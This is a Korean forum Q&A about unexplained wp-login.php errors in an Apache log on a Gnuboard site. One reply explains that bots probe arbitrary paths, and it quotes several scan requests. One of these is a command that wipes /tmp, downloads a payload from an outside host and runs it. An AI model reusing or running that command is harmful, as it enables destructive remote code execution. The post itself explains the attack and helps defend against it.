이 에러로그는 왜 나오는 걸까요?
본문
[php7:error] [pid 2457] [client 아이피:61642] script '/var/www/html/wp-login.php' not found or unable to stat
당연하게 그누보드 사용중인데, 왜 워드프레스 로그인을 요청하는 걸까요?
계속 에러로그가 떠서 신경쓰이는데, 해결방법을 알고 싶습니다.
환경은 센토스, 아파치, 마리아디비 php7.3 입니다.
답변 2
무차별 REQUEST_URI 대입입니다.
/wp-load.php
/s_e.php
/s_ne.php
/wikindex.php?f=/NmRtJOUjAdutReQj/scRjKUhleBpzmTyO.txt
/shell?cd+/tmp;rm+-rf+*;wget+heylitimysun.top/jaws;sh+/tmp/jaws
/phpMyAdmin-5.2.0-all-languages
/wp-admin/style.php?sig=rename
/wp1/wp-includes/wlwmanifest.xml
/autodiscover/autodiscover.json?@zdi/Powershell
/boaform/admin/formLogin
...
보통 봇으로 돌리기 때문에 요청 호스트가 도메인이 아닌 IP 인 경우가 많고
요청이 들어오는 헤더의 호스트가 조작되는 케이스도 있습니다.
127.0.0.1:80
localhost:8080
www.google.com:443
아무 URI 나 호출하다가 하나 얻어걸리고 그 이후 액션이 통과되는 경우
운나쁘면 사이트가 털릴수 있습니다.
!-->!-->해당파일이 존재하지 않거나 해당파일이 가지는 권한이 없다고 하는 내용입니다.
어떤 그누보드인지는 모르겠으나 사용하는 페이지가 sns로그인이나 다른 로그인을 사용중인 스크립트가 있다면 해당 부분을 주석처리하고 사용해보시는게 좋을것 같아요
답변을 작성하시기 전에 로그인 해주세요.